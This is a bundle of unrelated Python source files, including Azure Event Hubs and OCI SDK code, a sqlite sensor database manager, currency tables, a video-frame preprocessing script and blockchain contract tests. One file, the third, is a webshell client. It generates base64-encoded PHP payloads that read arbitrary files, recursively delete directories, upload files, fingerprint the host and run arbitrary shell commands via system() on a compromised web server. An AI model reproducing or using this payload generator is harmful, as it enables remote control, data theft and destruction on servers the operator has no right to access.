error = ValueError("This consumer client is already receiving events for consumer group {}. "
.format(consumer_group))
elif (consumer_group, partition_id) in self._event_processors:
error = ValueError("This consumer is already receiving events from partition {} for consumer group {}. "
.format(partition_id, consumer_group))
if error:
log.warning(error)
raise error
event_processor = EventProcessor(
self, consumer_group, on_events,
partition_manager=self._partition_manager,
polling_interval=self._load_balancing_interval,
**kwargs
)
self._event_processors[(consumer_group, partition_id or "-1")] = event_processor
event_processor.start()
def close(self):
# type: () -> None
"""Stop retrieving events from event hubs and close the underlying AMQP connection and links.
:rtype: None
.. admonition:: Example:
.. literalinclude:: ../samples/sync_samples/sample_code_eventhub.py
:start-after: [START eventhub_consumer_client_close_sync]
:end-before: [END eventhub_consumer_client_close_sync]
:language: python
:dedent: 4
:caption: Close down the client.
"""
with self._lock:
for _ in range(len(self._event_processors)):
_, ep = self._event_processors.popitem()
ep.stop()
super(EventHubConsumerClient, self).close()
|
# coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class ListObjects(object):
"""
To use any of the API operations, you must be authorized in an IAM policy. If you are not authorized,
talk to an administrator. If you are an administrator who needs to write policies to give users access, see
`Getting Started with Policies`__.
__ https://docs.cloud.oracle.com/Content/Identity/Concepts/policygetstarted.htm
"""
def __init__(self, **kwargs):
"""
Initializes a new ListObjects object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param objects:
The value to assign to the objects property of this ListObjects.
:type objects: list[oci.object_storage.models.ObjectSummary]
:param prefixes:
The value to assign to the prefixes property of this ListObjects.
:type prefixes: list[str]
:param next_start_with:
The value to assign to the next_start_with property of this ListObjects.
:type next_start_with: str
"""
self.swagger_types = {
'objects': 'list[ObjectSummary]',
'prefixes': 'list[str]',
'next_start_with': 'str'
}
self.attribute_map = {
'objects': 'objects',
'prefixes': 'prefixes',
'next_start_with': 'nextStartWith'
}
self._objects = None
self._prefixes = None
self._next_start_with = None
@property
def objects(self):
"""
**[Required]** Gets the objects of this ListObjects.
An array of object summaries.
:return: The objects of this ListObjects.
:rtype: list[oci.object_storage.models.ObjectSummary]
"""
return self._objects
@objects.setter
def objects(self, objects):
"""
Sets the objects of this ListObjects.
An array of object summaries.
:param objects: The objects of this ListObjects.
:type: list[oci.object_storage.models.ObjectSummary]
"""
self._objects = objects
@property
def prefixes(self):
"""
Gets the prefixes of this ListObjects.
Prefixes that are common to the results returned by the request if the request specified a delimiter.
:return: The prefixes of this ListObjects.
:rtype: list[str]
"""
return self._prefixes
@prefixes.setter
def prefixes(self, prefixes):
"""
Sets the prefixes of this ListObjects.
Prefixes that are common to the results returned by the request if the request specified a delimiter.
:param prefixes: The prefixes of this ListObjects.
:type: list[str]
"""
self._prefixes = prefixes
@property
def next_start_with(self):
"""
Gets the next_start_with of this ListObjects.
The name of the object to use in the `start` parameter to obtain the next page of
a truncated ListObjects response. Avoid entering confidential information.
Example: test/object1.log
:return: The next_start_with of this ListObjects.
:rtype: str
"""
return self._next_start_with
@next_start_with.setter
def next_start_with(self, next_start_with):
"""
Sets the next_start_with of this ListObjects.
The name of the object to use in the `start` parameter to obtain the next page of
a truncated ListObjects response. Avoid entering confidential information.
Example: test/object1.log
:param next_start_with: The next_start_with of this ListObjects.
:type: str
"""
self._next_start_with = next_start_with
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
|
<gh_stars>1-10
import base64
def getFilePathBase():
"""
获取请求url文件的文件路径
:return: php->base64 code
"""
code = """
@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
header("Content-Type:application/json");
$res = array();$res["path"] = dirname(__FILE__);
echo ("<ek>");
echo json_encode($res);
echo ("</ek>");
die();
"""
return base64.b64encode(code.encode("UTF-8")).decode("UTF-8")
def getFilelistBase(path):
"""
获取该路径下所有文件信息
:param path: 文件路径
:return: PHP->base64 code
"""
code = """
header("Content-Type:application/json");
@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
function getfile($path){
$i=0;
$res = array();
if($handler = opendir($path)){
while (($file = readdir($handler)) !==false){
$f = array();
$f["name"] = $file;
$f['type'] = filetype($path ."/". $file);
$f['time'] = date("Y-m-d H:i:s", filemtime($path ."/". $file));
$f['size'] = filesize($path ."/". $file);
$res[$i] = $f;
$i++;
}
closedir($handler);
}
echo ("<ek>");
echo json_encode($res);
echo ("</ek>");
}
getfile("%s");die();
"""% path
return base64.b64encode(code.encode("UTF-8")).decode("UTF-8")
def getFile(path):
"""
指定一个文件的路径,放回该文件的信息。
:param path: 文件路径
:return: PHP-> base64 code
"""
code = """
@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
$path = '%s';
$hanlder = fopen($path, 'rb');
$res = fread($hanlder, filesize($path));
fclose($hanlder);
echo $res;
"""% path
return base64.b64encode(code.encode("UTF-8")).decode("UTF-8")
def deleteFile(path):
"""
删除文件
:param path:
:return:
"""
code = """
@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
function df($p){
$m=@dir($p);
while(@$f=$m->read()){
$pf=$p."/".$f;
if((is_dir($pf))&&($f!=".")&&($f!="..")){
@chmod($pf,0777);
df($pf);
}
if(is_file($pf)){
@chmod($pf,0777);
@unlink($pf);
}
}
$m->close();
@chmod($p,0777);
return @rmdir($p);
}
function delf($path){
echo("<ek>");
if(is_dir($path)){
echo(df($path));
}
else{
echo(file_exists($path)?@unlink($path)?"1":"0":"0");
};
echo("</ek>");
die();
}
delf("%s");""" % path
return base64.b64encode(code.encode("UTF-8")).decode("UTF-8")
def changeName(path, newnamepath):
code="""
@ini_set("display_errors","0");
@set_time_limit(0);
echo("<ek>");;
echo(rename("%s","%s")?"1":"0");;
echo("</ek>");
die();""" % (path, newnamepath)
return base64.b64encode(code.encode("UTF-8")).decode("UTF-8")
def uploadFile(path, content):
code="""
@ini_set("display_errors","0");
@set_time_limit(0);
echo("<ek>");
function f($f,$c){
$c=str_replace("\r","",$c);
$c=str_replace("\n","",$c);
$buf="";
for($i=0;$i<strlen($c);$i+=2){
$buf.=urldecode("%".substr($c,$i,2));
}
echo(fwrite(fopen($f,"w"),$buf)?"1":"0");;
echo("</ek>");
die();
}
"""+"""f('%s','%s');""" % (path, content)
return base64.b64encode(code.encode("UTF-8")).decode("UTF-8")
def createFile(path, content):
code="""
@ini_set("display_errors","0");
@set_time_limit(0);
function f($path, $content){
echo("<ek>");;
echo @fwrite(@fopen($path,"w"),$content)?"1":"0";;
echo("</ek>");
die();
}
f('%s', '%s');""" % (path, content)
return base64.b64encode(code.encode("UTF-8")).decode("UTF-8")
def createDir(path):
code="""
@ini_set("display_errors","0");
@set_time_limit(0);
function c($path){
echo("<ek>");;
echo(mkdir($path)?"1":"0");;
echo("</ek>");
die();
}
c('%s');
"""%path
return base64.b64encode(code.encode("UTF-8")).decode("UTF-8")
def execShellCreate():
code="""
@ini_set("display_errors","0");
@set_time_limit(0);
echo("<ek>");;
$D=dirname($_SERVER["SCRIPT_FILENAME"]);
if($D=="")
$D=dirname($_SERVER["PATH_TRANSLATED"]);
$R="{$D}\t";
if(substr($D,0,1)!="/"){
foreach(range("A","Z") as $L)
if(is_dir("{$L}:"))$R.="{$L}:";
}
$R.="\t";
$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';
$usr=($u)?$u['name']:@get_current_user();
$R.=php_uname();
$R.="({$usr})";
print $R;;
echo("</ek>");
die();"""
return base64.b64encode(code.encode("UTF-8")).decode("UTF-8")
def execShell(cmd, options):
code = """
@ini_set("display_errors","0");
@set_time_limit(0);
echo("->|");;
$p=base64_decode('%s');
$s=base64_decode('%s');
$d=dirname($_SERVER["SCRIPT_FILENAME"]);
$c=substr($d,0,1)=="/"?"-c \\"{$s}\\"":"/c \\"{$s}\\"";$r="{$p} {$c}";
@system($r." 2>&1",$ret);
print ($ret!=0)?"ret={$ret}":"";;
echo("|<-");die();
"""% (cmd, options)
return base64.b64encode(code.encode("UTF-8")).decode("UTF-8")
if __name__ == '__main__':
# print(deleteFile("C:/Users/elloit/Desktop/php/PHPTutorial/WWW/pass.txt"))
print(uploadFile('/vae/asd/asd', 'asdasd'))
|
'''
DataBear database manager class
- init: Connect to database (databear.db) or create if none
- load_sensor: Loads measurements to database from sensor_class
- Various get/set methods
'''
import os
import sys
import sqlite3
import importlib
#-------- Database Initialization and Setup ------
class DataBearDB:
'''
The sqlite database for databear
'''
def __init__(self):
'''
Initialize the database manager
- Connect to database in path DBDRIVER
-- If none, create
-- If not set check CWD or create in CWD
- Create connection to database
'''
try:
self.dbpath = os.environ['DBDATABASE']
except KeyError:
#DBDATABASE not set, assume databear.db in CWD
self.dbpath = 'databear.db'
# Add SENSORSPATH to pythonpath for importing alternative sensors
if 'DBSENSORPATH' in os.environ:
sys.path.append(os.environ['DBSENSORPATH'])
#Set an attribute for config_id related functions
self.configtables = {
'sensor':['sensor_config_id','sensor_configuration'],
'logging':['logging_config_id','logging_configuration']
}
# Check if database exists
exists = os.path.isfile(self.dbpath)
# Initialize database sqlite connection object
# This will create the file if it doesn't exist, hence the check first
self.conn = sqlite3.connect(self.dbpath, check_same_thread=False)
self.conn.row_factory = sqlite3.Row
self.curs = self.conn.cursor()
self.path = os.path.dirname(__file__)
# Only initialize if the database didn't already exist
if not exists:
with open(self.path + '/databearDB.sql', 'r') as sql_init_file:
sql_script = sql_init_file.read()
self.curs.executescript(sql_script)
@property
def sensors_available(self):
'''
A list of sensors from the sensors table
'''
sensorlist = []
self.curs.execute('SELECT * FROM sensors_available')
for row in self.curs.fetchall():
sensorlist.append(row['sensor_module'])
return sensorlist
@property
def active_sensor_ids(self):
'''
Return a dictionary mapping sensor name to id for active sensors
'''
sensorids = {}
self.curs.execute('SELECT sensors.sensor_id AS sensor_id, name '
'FROM sensors JOIN '
'sensor_configuration ON '
'sensors.sensor_id = sensor_configuration.sensor_id '
'WHERE status=1')
for row in self.curs.fetchall():
sensorids[row['name']] = row['sensor_id']
return sensorids
@property
def sensor_modules(self):
'''
Return a dictionary mapping sensor names to classes
'''
sensormodules = {}
self.curs.execute('SELECT name, module_name FROM sensors')
for row in self.curs.fetchall():
sensormodules[row['name']] = row['module_name']
return sensormodules
@property
def process_ids(self):
'''
A dictionary mapping process names to ids
'''
processids = {}
self.curs.execute('SELECT process_id, name FROM processes')
for row in self.curs.fetchall():
processids[row['name']] = row['process_id']
return processids
def load_sensor(self,module_name):
'''
Loads sensor module to the sensors_available table if not already there.
Also load sensor measurements into database if not already there.
'''
#Check if sensor is already in sensors_available
if module_name in self.sensors_available:
return
# Import sensor to load measurements to measurements table
# DBSENSORPATH added to sys.path during init
sensor_module = importlib.import_module(module_name)
# Load class. Class name should be dbsensor
sensor_class = getattr(sensor_module,'dbsensor')
#Load sensor measurements to database
for measurement_name in sensor_class.measurements:
self.addMeasurement(
module_name,
measurement_name,
sensor_class.units[measurement_name],
sensor_class.measurement_description.get(measurement_name,None)
)
#Update sensors_available table
#Do this last to ensure there is no failure loading measurements
#prior to making the sensor available
self.curs.execute('INSERT INTO sensors_available '
'(sensor_module) VALUES (?)',(module_name,))
self.conn.commit()
def addMeasurement(self,sensormodule,measurename,units,description=None):
'''
Add a measurement to the database
Returns new rowid
'''
addqry = ('INSERT INTO measurements '
'(name,units,description,sensor_module) '
'VALUES (?,?,?,?)')
qryparams = (measurename,units,description,sensormodule)
self.curs.execute(addqry,qryparams)
self.conn.commit()
return self.curs.lastrowid
def addSensor(self,modulename,sensorname,serialnumber,address,virtualport,description=None):
'''
Add a new sensor to the database
'''
addqry = ('INSERT INTO sensors '
'(name,serial_number,address,virtualport,module_name,description) '
'VALUES (?,?,?,?,?,?)')
qryparams = (sensorname,serialnumber,address,virtualport,modulename,description)
self.curs.execute(addqry,qryparams)
self.conn.commit()
return self.curs.lastrowid
def addSensorConfig(self, sensor_id, measure_interval):
'''
Add a new sensor configuration to the system
'''
self.curs.execute('INSERT INTO sensor_configuration '
'(sensor_id,measure_interval,status) '
'VALUES (?,?,?)',(sensor_id,measure_interval,1))
self.conn.commit()
return self.curs.lastrowid
def addLoggingConfig(self, measurement_id, sensor_id, storage_interval, process_id, status):
'''
Add a new logger configuration
'''
params = (measurement_id, sensor_id, storage_interval, process_id, status)
self.curs.execute('INSERT INTO logging_configuration '
'(measurement_id, sensor_id, storage_interval, process_id, status) '
'VALUES (?,?,?,?,?)',params)
self.conn.commit()
return self.curs.lastrowid
def getSensorIDs(self,activeonly=False):
'''
Return list of sensor ids.
activeonly: true/false, to return only active sensorids
'''
sensor_ids = []
if activeonly:
qry = ('SELECT sensor_id FROM sensor_configuration '
'WHERE status=1')
else:
qry = 'SELECT sensor_id FROM sensors'
self.curs.execute(qry)
for row in self.curs.fetchall():
sensor_ids.append(row["sensor_id"])
return sensor_ids
def getConfigIDs(self,configtype,activeonly=False):
'''
Return list of configuration IDs from either sensor config or logging config.
configtype = 'sensor' or 'logging'
activeonly = True/False, when true only active configs returned
'''
ids = []
qry = 'SELECT {} from {}'.format(
self.configtables[configtype][0],
self.configtables[configtype][1])
if activeonly:
qry = qry + ' WHERE status=1'
for row in self.curs.execute(qry):
ids.append(row[self.configtables[configtype][0]])
return ids
def getMeasurementID(self,measurement_name,module_name):
'''
Get the measurement id for a given name and sensor class
'''
params = (measurement_name,module_name)
self.curs.execute('SELECT measurement_id FROM measurements '
'WHERE name=? and sensor_module=?',params)
row = self.curs.fetchone()
if not row:
return None
return row['measurement_id']
def getSensorID(self,sensorname,serialnumber,address,virtualport,modulename):
'''
Get sensor id associated with parameters
Return sensor_id or none
'''
params = (sensorname,serialnumber,address,virtualport,modulename)
self.curs.execute('SELECT sensor_id FROM sensors '
'WHERE name=? AND serial_number=? '
'AND address=? AND virtualport=? '
'AND module_name=?',params)
row = self.curs.fetchone()
if not row:
return None
return row['sensor_id']
def getSensorConfigID(self,sensor_id,measure_interval):
'''
Get sensor configuration id associated with parameters
Return sensor_config_id or none
'''
params = (sensor_id,measure_interval)
self.curs.execute('SELECT sensor_config_id FROM sensor_configuration '
'WHERE sensor_id=? AND measure_interval=?',params)
row = self.curs.fetchone()
if not row:
return None
return row['sensor_config_id']
def getLoggingConfigID(self,measurement_id,sensor_id,storage_interval,process_id):
'''
Get logging configuration id associated with parameters
Return sensor_config_id or none
'''
params = (measurement_id,sensor_id,storage_interval,process_id)
self.curs.execute('SELECT logging_config_id FROM logging_configuration '
'WHERE measurement_id=? AND sensor_id=? '
'AND storage_interval=? AND process_id=?',params)
row = self.curs.fetchone()
if not row:
return None
return row['logging_config_id']
def getSensorConfig(self, sensor_id):
'''
Return the given sensor's object as a sensor object (name, serial_number, etc.)
or None if id is invalid
'''
sensor = {}
sensor_id = (sensor_id,)
self.curs.execute("Select * from sensors s inner join "
"sensor_configuration sc on s.sensor_id = sc.sensor_id "
"where s.sensor_id = ? and sc.status = 1", sensor_id)
row = self.curs.fetchone()
if not row:
return None
sensor["name"] = row["name"]
sensor["serial_number"] = row["serial_number"]
sensor["address"] = row["address"]
sensor["virtualport"] = row["virtualport"]
sensor["measure_interval"] = row["measure_interval"]
sensor["module_name"] = row["module_name"]
sensor["sensor_config_id"] = row["sensor_config_id"]
return sensor
def getLoggingConfig(self, logging_config_id):
# Get a logging configuration by it's id
# Logging configurations join with measurements, processes, and sensors to get all their details
config = {}
self.curs.execute(
'SELECT m.name AS measurement_name, s.name AS sensor_name, '
'p.name AS process_name, storage_interval FROM logging_configuration l '
'INNER JOIN measurements m ON l.measurement_id = m.measurement_id '
'INNER JOIN processes p ON l.process_id = p.process_id '
'INNER JOIN sensors s on l.sensor_id = s.sensor_id '
'WHERE l.logging_config_id = ?', (logging_config_id,))
row = self.curs.fetchone()
if not row:
return None
config["measurement_name"] = row["measurement_name"]
config["sensor_name"] = row["sensor_name"]
config["storage_interval"] = row["storage_interval"]
config["process"] = row["process_name"]
return config
def setConfigStatus(self,configtype,config_id,status='activate'):
'''
Set a configuration to active or not active
configtype = 'sensor' or 'logging'
config_id
toggle = 'activate' or 'deactivate'
'''
togglecode = {'activate':1,'deactivate':None}
qry = 'UPDATE {} SET status=? WHERE {}=?'.format(
self.configtables[configtype][1],
self.configtables[configtype][0]
)
self.curs.execute(qry,(togglecode[status],config_id))
self.conn.commit()
def storeData(self, datetime, value, sensor_config_id, logging_config_id, qc_flag):
'''
Store data value in database
Inputs:
- datetime [string]
Returns new rowid
'''
storeqry = ('INSERT INTO data '
'(dtstamp,value,sensor_configid,logging_configid,qc_flag) '
'VALUES (?,?,?,?,?)')
qryparams = (datetime, float(value), sensor_config_id, logging_config_id, qc_flag)
self.curs.execute(storeqry,qryparams)
self.conn.commit()
return self.curs.lastrowid
def close(self):
'''
Close all connections
'''
self.curs.close()
self.conn.close()
|
<reponame>zx9r/RobosatsTwitterOrderbook
# From https://github.com/Reckless-Satoshi/robosats/blob/main/frontend/static/assets/currencies.json
CURRENCIES = {
"1": "USD",
"2": "EUR",
"3": "JPY",
"4": "GBP",
"5": "AUD",
"6": "CAD",
"7": "CHF",
"8": "CNY",
"9": "HKD",
"10": "NZD",
"11": "SEK",
"12": "KRW",
"13": "SGD",
"14": "NOK",
"15": "MXN",
"16": "KRW",
"17": "RUB",
"18": "ZAR",
"19": "TRY",
"20": "BRL",
"21": "CLP",
"22": "CZK",
"23": "DKK",
"24": "HRK",
"25": "HUF",
"26": "INR",
"27": "ISK",
"28": "PLN",
"29": "RON",
"30": "ARS",
"31": "VES",
"32": "COP",
"33": "PEN",
"34": "UYU",
"35": "PYG",
"36": "BOB",
"37": "IDR",
"38": "ANG",
"39": "CRC",
"40": "CUP",
"41": "DOP",
"42": "GHS",
"43": "GTQ",
"44": "ILS",
"45": "JMD",
"46": "KES",
"47": "KZT",
"48": "MYR",
"49": "NAD",
"50": "NGN",
"51": "AZN",
"52": "PAB",
"53": "PHP",
"54": "PKR",
"55": "QAR",
"56": "SAR",
"57": "THB",
"58": "TTD",
"59": "VND",
"60": "XOF",
"61": "TWD",
"300": "XAU",
"1000": "BTC"
}
# From https://github.com/Reckless-Satoshi/robosats/blob/a4a76d1d9f3af090fc3ef8250b9e9df8b7d9874f/frontend/src/components/getFlags.js
def get_flag(code):
flags = {
'AUD': '🇦🇺',
'ARS': '🇦🇷',
'BRL': '🇧🇷',
'CAD': '🇨🇦',
'CHF': '🇨🇭',
'CLP': '🇨🇱',
'CNY': '🇨🇳',
'EUR': '🇪🇺',
'HRK': '🇨🇷',
'CZK': '🇨🇿',
'DKK': '🇩🇰',
'GBP': '🇬🇧',
'HKD': '🇭🇰',
'HUF': '🇭🇺',
'INR': '🇮🇳',
'ISK': '🇮🇸',
'JPY': '🇯🇵',
'KRW': '🇰🇷',
'MXN': '🇲🇽',
'NOK': '🇳🇴',
'NZD': '🇳🇿',
'PLN': '🇵🇱',
'RON': '🇷🇴',
'RUB': '🇷🇺',
'SEK': '🇸🇪',
'SGD': '🇸🇬',
'VES': '🇻🇪',
'TRY': '🇹🇷',
'USD': '🇺🇸',
'ZAR': '🇿🇦',
'COP': '🇨🇴',
'PEN': '🇵🇪',
'UYU': '🇺🇾',
'PYG': '🇵🇾',
'BOB': '🇧🇴',
'IDR': '🇮🇩',
'ANG': '🇧🇶',
'CRC': '🇨🇷',
'CUP': '🇨🇺',
'DOP': '🇩🇴',
'GHS': '🇬🇭',
'GTQ': '🇬🇹',
'ILS': '🇮🇱',
'JMD': '🇯🇲',
'KES': '🇰🇪',
'KZT': '🇰🇿',
'MYR': '🇲🇲',
'NAD': '🇳🇦',
'NGN': '🇳🇬',
'AZN': '🇦🇿',
'PAB': '🇵🇦',
'PHP': '🇵🇭',
'PKR': '🇵🇰',
'QAR': '🇶🇦',
'SAR': '🇸🇦',
'THB': '🇹🇭',
'TTD': '🇹🇹',
'VND': '🇻🇳',
'XOF': '🇸🇳',
'XAU': '🟨',
}
try:
flag = flags[code]
except KeyError:
flag = '🏳'
return flag
|
import argparse
import os
import numpy as np
import cv2
import time
import pandas as pd
from tqdm import tqdm
from joblib import Parallel, delayed
def parse_args():
"""
Helper function to parse command line arguments
"""
parser = argparse.ArgumentParser(
description="dump epic kitchens flow images into pickle files"
)
parser.add_argument(
"annotation_file",
help="<path_to_epic_kitchens>/annotations/<annotation_file>.csv",
type=str,
)
parser.add_argument(
"root_dir",
help="<path_to_epic_kitchens>/EPIC_KITCHENS_2018/frames_rgb_flow/flow/<train or test>",
type=str,
)
parser.add_argument(
"--out-dir",
dest="out_dir",
help="path to save output files",
default="./epic/flow",
type=str,
)
parser.add_argument(
"--file-format",
dest="file_format",
help="naming format of image files",
default="frame_{:010d}.jpg",
type=str,
)
parser.add_argument(
"--win-len",
dest="win_len",
help="number of flow frames to read",
default=5,
type=int,
)
parser.add_argument(
"--njobs", dest="njobs", help="no of cpu cores to use", default=4, type=int,
)
return parser.parse_args()
def get_time_diff(start_time, end_time):
"""
Helper function to calculate time difference
Args
----------
start_time: float
Start time in seconds since January 1, 1970, 00:00:00 (UTC)
end_time: float
End time in seconds since January 1, 1970, 00:00:00 (UTC)
Returns
----------
hours: int
Difference of hours between start and end time
minutes: int
Difference of minutes between start and end time
seconds: int
Difference of seconds between start and end time
"""
hours = int((end_time - start_time) / 3600)
minutes = int((end_time - start_time) / 60) - (hours * 60)
seconds = round((end_time - start_time) % 60)
return (hours, minutes, seconds)
def read_image(path, img_file):
"""
Helper function to read image file(s)
Args
----------
path: str
Source path of image file
img_file: str
Name of image file
Returns
----------
img: np.ndarray
A numpy array of the image
"""
assert os.path.exists(
os.path.join(path, "u", img_file)
), "{} file does not exist".format(os.path.join(path, "u", img_file))
u_img = cv2.imread(os.path.join(path, "u", img_file), 0)
assert os.path.exists(
os.path.join(path, "u", img_file)
), "{} file does not exist".format(os.path.join(path, "v", img_file))
v_img = cv2.imread(os.path.join(path, "v", img_file), 0)
img = np.concatenate((u_img[..., None], v_img[..., None]), axis=2)
return img
def integrity_check(file):
"""
Helper function to check integrity of a compressed numpy file
Args
----------
file: str
Absolute location of compressed numpy file
Returns
----------
check_flag: bool
A flag confirming if the file is ok or not
"""
check_flag = None
try:
with np.load(file) as data:
_ = data["flow"]
data.close()
check_flag = True
except:
print("{} is corrupted. Overwriting file.".format(file))
check_flag = False
return check_flag
def save_images_to_pickle(
annotations,
root_dir,
out_dir,
win_len,
file_format="frame_{:010d}.jpg",
attempts=10,
):
"""
Helper function to iterate over each frame of a trimmed action segment and
save the array of stacked flow frames to a compressed numpy file
Args
----------
record: pd.dataframe row
Row with trimmed action segmentation of untrimmed video
root_dir: str
Root directory of dataset
out_dir: str
Directory to store output files
win_len: int
No of optical flow frames to stack
file_format: str, default="frame_{:010d}.jpg"
File naming format
attempts: int, default=10
No of attempts to write files
"""
for _, record in annotations.iterrows():
vid_id = record["video_id"]
vid_path = os.path.join(root_dir, record["participant_id"], vid_id)
o_dir = os.path.join(out_dir, "flow_pickle", vid_id)
os.makedirs(o_dir, exist_ok=True)
start_frame = max(record["start_frame"] // 2, 1)
end_frame = max(record["stop_frame"] // 2, 2)
full_read = True
for idx in range(start_frame, end_frame + 1 - win_len):
out_file = os.path.join(
o_dir, os.path.splitext(file_format.format(idx - 1))[0] + ".npz"
)
# If file exists and is ok, skip
if os.path.exists(out_file) and integrity_check(out_file):
full_read = True
continue
else:
for a in range(attempts):
# Create the whole flow stack for non-sequential frame indices
if full_read:
img = []
for i in range(win_len):
img.append(
read_image(vid_path, file_format.format(idx + i))
)
# Only append the data from new flow files in case of sequential frame indices
else:
img = [img[:, :, 2:]]
img.append(
read_image(vid_path, file_format.format(idx + win_len - 1))
)
img = np.concatenate(img, axis=2)
np.savez_compressed(out_file, flow=img)
if integrity_check(out_file):
full_read = False
break
elif a == attempts - 1:
print(
"Unable to save {} properly. File might be corrupted".format(
out_file
)
)
print("Completed saving flow frames for {}".format(record["participant_id"]))
def main(args):
annotations = pd.read_csv(args.annotation_file)
participant_list = annotations["participant_id"].unique().tolist()
start = time.time()
print(
"Processing {} video annoations for {} participants with {} concurrent workers".format(
annotations.shape[0], len(participant_list), args.njobs
)
)
print("----------------------------------------------------------")
# Parallel processing of each participant
# Videos for each participant will be processed sequentially to prevent multiple writes to same file
results = Parallel(n_jobs=args.njobs, verbose=10)(
delayed(save_images_to_pickle)(
annotations.query("participant_id == @p"),
args.root_dir,
args.out_dir,
args.win_len,
file_format=args.file_format,
)
for p in participant_list
)
print("Done")
print("----------------------------------------------------------")
print("Time taken[HH:MM:SS]: {}".format(get_time_diff(start, time.time())))
if __name__ == "__main__":
args = parse_args()
main(args)
|
from aeternity.contract_native import ContractNative
from aeternity import hashing, utils
from tests.conftest import random_domain
import pytest
contractAens = """contract DelegateTest =
// Transactions
stateful payable entrypoint signedPreclaim(addr : address,
chash : hash,
sign : signature) : unit =
AENS.preclaim(addr, chash, signature = sign)
stateful entrypoint signedClaim(addr : address,
name : string,
salt : int,
name_fee : int,
sign : signature) : unit =
AENS.claim(addr, name, salt, name_fee, signature = sign)
stateful entrypoint signedTransfer(owner : address,
new_owner : address,
name : string,
sign : signature) : unit =
AENS.transfer(owner, new_owner, name, signature = sign)
stateful entrypoint signedRevoke(owner : address,
name : string,
sign : signature) : unit =
AENS.revoke(owner, name, signature = sign)
"""
@pytest.mark.skip("blocked by https://github.com/aeternity/aepp-sdk-python/issues/306")
def test_node_contract_signature_delegation(compiler_fixture, chain_fixture):
compiler = compiler_fixture.COMPILER
account = chain_fixture.ALICE
bob = chain_fixture.BOB
contract_native = ContractNative(client=chain_fixture.NODE_CLI, source=contractAens, compiler=compiler, account=account)
contract_native.deploy()
assert(contract_native.address is not None)
# the contract_id
contract_id = contract_native.address
# node client
ae_cli = contract_native.client
# example name
name = random_domain(length=15)
c_id, salt = hashing.commitment_id(name, 9876)
name_ttl = 500000
client_ttl = 36000
name_fee = utils.amount_to_aettos("20AE")
print(f"name is {name}, commitment_id: {c_id}")
# aens calls
signature = ae_cli.delegate_name_preclaim_signature(account, contract_id)
call, r = contract_native.signedPreclaim(account.get_address(), c_id, signature)
assert(call.return_type == 'ok')
ae_cli.wait_for_confirmation(call.tx_hash)
signature = ae_cli.delegate_name_claim_signature(account, contract_id, name)
call, _ = contract_native.signedClaim(account.get_address(), name, salt, name_fee, signature)
assert(call.return_type == 'ok')
signature = ae_cli.delegate_name_transfer_signature(account, contract_id, name)
call, _ = contract_native.signedTransfer(account.get_address(), bob.get_address(), name, signature)
assert(call.return_type == 'ok')
signature = ae_cli.delegate_name_revoke_signature(bob, contract_id, name)
call, _ = contract_native.signedRevoke(bob.get_address(), name, signature)
assert(call.return_type == 'ok')
contractOracles = """contract DelegateTest =
type fee = int
type ttl = Chain.ttl
type query_t = string
type answer_t = int
type oracle_id = oracle(query_t, answer_t)
type query_id = oracle_query(query_t, answer_t)
stateful payable entrypoint signedRegisterOracle(acct : address,
sign : signature,
qfee : fee,
ttl : ttl) : oracle_id =
Oracle.register(acct, qfee, ttl, signature = sign)
stateful payable entrypoint signedExtendOracle(o : oracle_id,
sign : signature, // Signed oracle address
ttl : ttl) : unit =
Oracle.extend(o, signature = sign, ttl)
datatype complexQuestion = Why(int) | How(string)
datatype complexAnswer = NoAnswer | Answer(complexQuestion, string, int)
stateful entrypoint signedComplexOracle(question, sig) =
let o = Oracle.register(signature = sig, Contract.address, 0, FixedTTL(1000)) : oracle(complexQuestion, complexAnswer)
let q = Oracle.query(o, question, 0, RelativeTTL(100), RelativeTTL(100))
Oracle.respond(o, q, Answer(question, "magic", 1337), signature = sig)
Oracle.get_answer(o, q)
"""
|
<filename>crystalpy/examples/main.py
import numpy as np
import matplotlib.pyplot as plt
from crystalpy.diffraction.DiffractionSetupSweeps import DiffractionSetupSweeps
from crystalpy.diffraction.Diffraction import Diffraction
from crystalpy.examples.Values import Values
from crystalpy.examples.PlotData1D import PlotData1D
from crystalpy.polarization.MuellerDiffraction import MuellerDiffraction
def intensity_phase_plot(plot_1d, values):
"""
Plot the diffraction results.
:param plot_1d: PlotData1D object.
:param values: Values object.
"""
# Create subplots.
f, ((ax1_intensity, ax2_intensity, ax3_intensity),
(ax1_phase, ax2_phase, ax3_phase)) = plt.subplots(2, 3, sharex="all", sharey="row")
ax1_intensity.plot(plot_1d[0].x, plot_1d[0].y, "b-")
ax1_intensity.set_title(plot_1d[0].title)
ax1_intensity.set_xlabel(plot_1d[0].title_x_axis)
ax1_intensity.set_ylabel(plot_1d[0].title_y_axis)
ax1_intensity.set_xlim([values.angle_deviation_min, values.angle_deviation_max])
ax1_intensity.set_ylim([0, 1])
ax1_phase.plot(plot_1d[3].x, plot_1d[3].y, "g-.")
ax1_phase.set_title(plot_1d[3].title)
ax1_phase.set_xlabel(plot_1d[3].title_x_axis)
ax1_phase.set_ylabel(plot_1d[3].title_y_axis)
ax1_phase.set_xlim([values.angle_deviation_min, values.angle_deviation_max])
ax1_phase.set_ylim([values.phase_inf_limit, values.phase_sup_limit])
ax2_intensity.plot(plot_1d[1].x, plot_1d[1].y, "b-")
ax2_intensity.set_title(plot_1d[1].title)
ax2_intensity.set_xlabel(plot_1d[1].title_x_axis)
ax2_intensity.set_ylabel(plot_1d[1].title_y_axis)
ax2_intensity.set_xlim([values.angle_deviation_min, values.angle_deviation_max])
ax2_intensity.set_ylim([0, 1])
